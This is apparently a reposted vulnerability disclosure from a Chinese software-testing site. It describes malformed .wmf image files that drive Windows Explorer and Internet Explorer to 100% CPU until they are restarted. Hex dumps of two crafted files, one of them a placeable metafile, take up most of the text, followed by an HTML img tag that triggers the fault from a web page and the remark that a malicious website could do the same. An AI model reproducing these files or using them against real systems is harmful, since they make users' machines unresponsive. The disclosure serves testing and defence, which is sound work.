Here is an example of malformed .wmf file which will cause DoS. Put this file in \
arbitrary folder (be sure that file has .wmf extension, otherwise this wouldn't \
work). Open that folder with Windows Explorer, and just move mouse over malformed \
file. CPU usage will rise to 100%, and stay that way. During this condition you can \
work with explorer, but it behaves very weird. It doesn't help if you close all \
explorer's windows, you must restart explorer.exe, only then CPU usage will get down \
to normal. Instead of "mouseover" you could doubleclick on file to produce same \
effect.
Here is .wmf file:
00000000 :01 00 09 00 00 03 0E 00 - 00 00 01 00 05 00 00 00
00000010 :00 00 00 00 00 00 0B 02 - FF FF FF FF
Now, this was "bare" .wmf file, and if you put a link in html pointing to it, IE \
won't render it, and there is no problem. What we need is a placeable metafile, and \
this is one:
00000000 :D7 CD C6 9A 00 00 00 00 - 00 00 A1 21 EC 29 EC 09
00000010 :00 00 00 00 B0 56 01 00 - 09 00 00 03 0E 00 00 00
00000020 :01 00 05 00 00 00 00 00 - 00 00 00 00 0B 02 00 00
00000030 :00 00
测试程序:
<html><body><img src="test.wmf"></body></html>
When you open html document, IE will try to render test.wmf and CPU is again on 100%, \
and again you have to restart IE to slow it down. Malicious website could easily do \
the same.
文章来源于领测软件测试网 https://www.ltesting.net/
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073